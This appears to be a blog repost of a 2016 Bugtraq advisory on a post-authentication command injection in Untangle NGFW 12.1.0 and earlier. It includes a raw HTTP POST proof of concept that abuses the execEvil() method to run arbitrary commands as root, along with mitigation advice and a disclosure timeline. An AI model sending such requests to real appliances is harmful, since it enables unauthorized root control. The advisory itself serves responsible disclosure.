Tuesday, June 28, 2016

Bugtraq: [fd] CVE ID request: Untangle NGFW <=v12.1.0 post-auth command injection

Product:

http://ift.tt/29fKkTs

Description:

CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')

The Untangle NGFW <= 12.1.0 web interface is prone to a command injection vulnerability, allowing non-root users to execute arbitrary commands with root privileges and gain remote shell access to the appliance.

This vulnerability can be triggered via modifying any request made via functionality accessible from the Network->Troubleshooting->Network Tests window using an intercepting proxy or with otherwise crafted requests to abuse the execEvil() function.

The appliance web interface is accessible via unsecured HTTP by default. This leaves the appliance vulnerable to Man-in-the-Middle attacks that allow attackers to intercept plaintext credentials, facilitating exploitation of this vulnerability for further elevation of privileges.

Solution:

No official solution is currently available. Restrict access, consider Administrator interface access equivalent to root privileges.

Vulnerability Discovery:

Matthew Bush (The Missing Link)

Proof of Concept:

With a local intercepting proxy, alter the "params" field for any POST request to execEvil to execute any arbitrary command (eg, using the Ping Test) once logged in and assigned a nonce value for the session:

---

POST http://ift.tt/290Q18m HTTP/1.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Content-Type: text/plain

Content-Length: 99

Cookie: JSESSIONID=3C6A2963EFB628FA83AF6B6563222C6F; pysid=ce0629f79bd506f9543381e7eb7d7b7a

Connection: keep-alive

Host: 192.168.68.154

{"id":5,"nonce":"fbejsu4c77toq8a5igr1320i2p","method":".obj#2082962752.e

xecEvil","params":["id"]}

---

Exploit:

http://ift.tt/297UmtM

Disclosure Timeline:

22/4/2016 Attempted to contact vendor after discovery of vulnerabilities

6/5/2016 No response from vendor, vulnerabilities reported to US-CERT (assigned VU#538103)

12/5/2016 US-CERT confirms contacting vendor

16/6/2016 US-CERT notifies of no response from vendor, suggested requesting CVE-ID via mailing list

27/6/2016 Public disclosure

Discovery Credit:

Matt Bush (@3xocyte)

The Missing Link (Sydney, Australia)

[ reply ]


from SecurityFocus Vulnerabilities http://ift.tt/29fN1o9

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.